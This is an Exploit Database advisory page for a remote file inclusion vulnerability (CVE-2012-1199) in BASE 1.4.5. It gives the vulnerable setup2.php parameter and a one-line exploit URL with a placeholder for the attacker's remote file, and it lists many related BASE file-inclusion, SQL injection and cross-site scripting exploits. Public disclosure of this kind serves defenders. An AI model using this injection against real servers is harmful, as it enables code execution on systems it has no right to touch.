Exploit Database - Logo

Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_PHP Parameter Remote File Inclusion

EDB-ID: 36723 Author: indoushka Published: 2012-02-11
CVE: CVE-2012-1199 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/51979/info
                     
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
                     
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
                     
BASE 1.4.5 is vulnerable; other versions may be affected.

Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]

Related Exploits

Trying to match CVEs (1): CVE-2012-1199
Trying to match OSVDBs (1): 79513
Other Possible E-DB Search Terms: Basic Analysis and Security Engine (BASE) 1.4.5,  Basic Analysis and Security Engine
Date D V Title Author
2009-05-23Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2.4 - 'readRoleCookie()' Authentication BypassTim Medin
2005-10-25Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2 - Base_qry_main.php SQL InjectionRemco Verhoef
2003-04-06Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site ScriptingAdam Ely
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File ...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrar...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php base_path Parameter Remote File Inc...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php base_path Parameter Remote File In...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php base_path Parameter Remote File Inclu...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php base_path Parameter Remote File Inclu...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php base_path Parameter Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php base_path Parameter Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php base_path Parameter Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php base_path Parameter Remote File Inclu...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php base_path Parameter Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php base_path Parameter Remote File Inclu...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php base_path Parameter Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php base_path Parameter Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php base_path Parameter Remote File Incl...indoushka
Menu